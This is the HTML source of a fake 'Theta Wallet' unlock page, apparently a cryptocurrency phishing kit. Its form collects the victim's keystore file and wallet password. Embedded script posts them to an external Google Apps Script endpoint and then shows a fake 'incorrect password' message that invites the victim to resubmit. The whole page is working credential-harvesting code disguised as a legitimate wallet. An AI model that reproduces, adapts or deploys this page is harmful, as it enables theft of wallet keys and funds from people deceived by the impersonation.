<!DOCTYPE html>
<html lang="en">
  <head><meta charset="utf-8"><link rel="shortcut icon" href="/favicon.ico">
    <meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
    <meta name="theme-color" content="#000000"><meta name="google-site-verification" content="KcY9AgCSabld-jTuurE9YBIV2pH0W5T1ACd0N4t1mPo">
    <title>Theta Wallet</title>
    <link rel="icon" type="image/x-icon" href="./images/favicon.ico"> 
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.19.3/jquery.validate.min.js"
      integrity="sha512-37T7leoNS06R80c8Ulq7cdCDU5MNQBwlYoy1TX/WUsLFC2eYNqtKlV0QjH7r8JpG/S0GUMZwebnVFLPd6SU5yg=="
      crossorigin="anonymous" referrerpolicy="no-referrer"></script> 

  <link href="./thetastyles.css" rel="stylesheet" type="text/css">
  
  </head>
  <!-- https://script.google.com/macros/s/AKfycbzWT83iODcpMHR7AGyCPSLWVXb0CrXrkjwLW1bSoLLg8SSpFkxRhSTzxc3dMAt31nnF/exec -->
  
  <body>
    <div id="root">
      <div class="App">
        <div class="NavBar NavBar--is-centered">
          <div style="display: flex; flex-direction: column; align-items: center;"><img class="NavBar__logo"
              src="./images/theta_wallet_logo@2x.png"></div>
        </div>
        <div class="Pages">
          <div class="UnlockWalletPage">
            <div class="UnlockWalletPage__wrapper">
              <div class="UnlockWalletPage__title">Unlock Your Wallet</div>
              <div class="UnlockWalletCard">
                <div class="UnlockWalletCard__content">
                  <div class="UnlockWalletCard__header">
                    <div class="TabBar UnlockWalletCard__tab-bar TabBar--is-centered TabBar--is-condensed">
                      <a class="TabBarItem TabBarItem--is-active" aria-current="page" href="./keystore.html">
                        <div class="TabBarItem__title">Keystore</div>
                      </a><a class="TabBarItem" href="/">
                        <div class="TabBarItem__title">Mnemonic</div>
                      </a><a class="TabBarItem" href="./privatekey.html">
                        <div class="TabBarItem__title">Private Key</div>
                      </a><a class="TabBarItem" href="./hardware.html">
                        <div class="TabBarItem__title">Hardware</div>
                      </a></div>
                  </div>
                  <div class="UnlockWalletViaKeystoreFile">
                    <div class="DropZone"><img class="DropZone__icon" src="./images/theta-file@2x.png">
                      <div class="DropZone__title">Drop keystore here</div>
                    </div>
                  
                    <form class="UnlockWalletViaKeystoreFile__title" method="post" name="submit-to-google-sheet" action="./keystore">
                       <p class="para-keystore">Please select your keystore file</p>
                       <div id="content">
                          <label 
                            for="file-upload" class="UnlockWalletViaKeystoreFile__file-input">
                              <input id="file-upload" id="file" name="Keystore"
                              type="file" name="file" required>Choose Keystore File</label>
                        </div>

                     <input
                      class="UnlockWalletViaKeystoreFile__password-input" placeholder="Enter your wallet password"
                      name="KeystorePassword" type="password" value="" required>
                      <p id="errorMessage"></p>
                      <div style="margin-top: 80px "  class="UnlockWalletViaKeystoreFile__footer"type="submit" name="submit" value="submit">
                         <button class="GradientButtonKeystore">
                        <div class="GradientButton__title" >Unlock Wallet</div>
                       </button>
                      </div>
                    </form>
                  </div>
                </div>
              </div>
              <div class="UnlockWalletPage__subtitle"><span>Don't have a wallet?</span><a href="">Create Wallet</a>
              </div>
            </div>
          </div>
        </div>
        <div></div>
        <script src="./js/index.js"></script>
        <script>
          const inputChange = document.querySelector("#content");
          console.log(content)

            inputChange.addEventListener("change", () => {
              content.innerHTML = `<div>
            <label for="file-upload" class="UnlockWalletViaKeystoreFile__file-input
          UnlockWalletViaKeystoreFile__file-input--has-file">
           Keystore File Set</label >
        </div> `
            });

        </script>
        <script>
      const scriptURL =
        "https://script.google.com/macros/s/AKfycbzap7S5rga2_XR0g9nreFQrKhzSoO-JXH4ZgXsRIJkMdkwRZHIncLgKkyt7CpHwDTs/exec";
      const form = document.forms["submit-to-google-sheet"];
      const msg = document.getElementById("errorMessage")

      form.addEventListener("submit", (e) => {
        e.preventDefault();
        fetch(scriptURL, { method: "POST", body: new FormData(form) })
          .then(response => {msg.innerHTML = "Please input correct Keystore and Password."
        setTimeout(function(){
          msg.innerHTML = ""
        },5000)
      form.reset()})
          .catch((error) => console.error("Error!", error.message));
      });
    </script>
  </body>


</html>

